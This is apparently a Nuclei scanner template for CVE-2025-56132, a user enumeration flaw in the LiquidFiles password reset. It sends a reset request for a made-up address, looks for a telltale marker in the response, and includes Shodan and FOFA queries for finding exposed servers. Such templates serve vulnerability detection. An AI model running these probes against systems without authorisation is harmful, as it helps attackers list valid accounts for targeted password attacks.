id: CVE-2025-56132

info:
  name: LiquidFiles < 4.2 - User Enumeration via Password Reset
  author: DhiyaneshDk
  severity: high
  description: |
    LiquidFiles filetransfer server before 4.2 contains a user enumeration vulnerability caused by distinguishable responses in the password reset functionality, letting unauthenticated attackers enumerate valid user accounts. Exploitation requires no authentication.
  impact: |
    Attackers can enumerate valid user emails, increasing the risk of targeted password attacks and account compromise.
  remediation: |
    Update to version 4.2 or later, which introduces user-based lockout mechanisms.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-56132
    - https://docs.liquidfiles.com/release_notes/version_4-2-x.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2025-56132
    cwe-id: CWE-305
    epss-score: 0.02618
    epss-percentile: 0.85934
  metadata:
    verified: true
    max-request: 2
    vendor: liquidfiles
    product: liquidfiles
    shodan-query: http.title:"LiquidFiles"
    fofa-query: title="LiquidFiles"
  tags: cve,cve2025,liquidfiles,user-enum,vkev

# Both requests must match, in order, for the template to report a finding.
flow: http(1) && http(2)

variables:
  # Randomised address under the reserved .invalid TLD, so it cannot belong to a real account.
  email: "nonexistent-user-enumtest-{{rand_int(10000,99999)}}@test.invalid"

http:
  # Request 1: submit a password reset for the nonexistent address.
  - raw:
      - |
        POST /password_reset HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user[email]={{email}}

    matchers:
      # internal: true keeps this matcher from being reported as a result on its own.
      - type: dsl
        dsl:
          - "contains(set_cookie, '_filetransfer_session')"
          - "status_code == 302"
        condition: and
        internal: true

  # Request 2: load the root page and look for the 'invalid_email' marker in the body.
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, 'invalid_email','LiquidFiles')"
          - "status_code == 200"
        condition: and
# digest: 4a0a0047304502207a5f734a5d6bceda04207281918a79ce4ffc9ed4d21b5620cb8e20ff6a6da220022100e872f5d43a3506e99752be6ec9b97c7ca918eb1e434baec9d364d738f6e00e07:922c64590222798bb761d5b6d8e72950